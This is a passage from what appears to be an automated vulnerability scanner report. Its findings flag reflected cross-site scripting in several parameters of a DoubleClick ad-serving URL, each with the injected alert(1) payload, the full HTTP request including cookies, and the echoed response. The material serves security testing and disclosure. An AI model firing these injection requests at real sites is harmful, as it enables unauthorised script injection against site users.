GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0865cd9"-alert(1)-"c00625812dd&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0865cd9"-alert(1)-"c00625812dd&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
va
...[SNIP]...

3.17. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9b5"-alert(1)-"3964ead4cbb was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=7c9b5"-alert(1)-"3964ead4cbb&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
00/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=7c9b5"-alert(1)-"3964ead4cbb&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.2
...[SNIP]...

3.18. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95dde"-alert(1)-"27c33359beb was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=10095dde"-alert(1)-"27c33359beb&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
15177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=10095dde"-alert(1)-"27c33359beb&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/h
...[SNIP]...

3.19. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d6a"-alert(1)-"df904e7515b was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=55d6a"-alert(1)-"df904e7515b&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
om/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=55d6a"-alert(1)-"df904e7515b&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=tradition
...[SNIP]...

3.20. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45027"-alert(1)-"b3054c498ad was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=200145027"-alert(1)-"b3054c498ad&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
45620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=200145027"-alert(1)-"b3054c498ad&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011
...[SNIP]...

3.21. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf0c"-alert(1)-"48df8c28707 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243bbf0c"-alert(1)-"48df8c28707&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243bbf0c"-alert(1)-"48df8c28707&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "o
...[SNIP]...

3.22. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5235"-alert(1)-"df6b9809de9 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412f5235"-alert(1)-"df6b9809de9&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412f5235"-alert(1)-"df6b9809de9&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Produc
...[SNIP]...

3.23. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7a4"-alert(1)-"f31f2c6fd97 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=5071087a7a4"-alert(1)-"f31f2c6fd97&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/16a/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=5071087a7a4"-alert(1)-"f31f2c6fd97&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnm
...[SNIP]...

3.24. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14624"-alert(1)-"577924b55b4 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=17514624"-alert(1)-"577924b55b4&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=17514624"-alert(1)-"577924b55b4&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ0
...[SNIP]...

3.25. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2d31"-alert(1)-"628e648557c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047b2d31"-alert(1)-"628e648557c&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4876

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/16a/%2a/o%3B236574810%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047b2d31"-alert(1)-"628e648557c&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssport
...[SNIP]...

3.26. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [t parameter]  previous  next

Summary

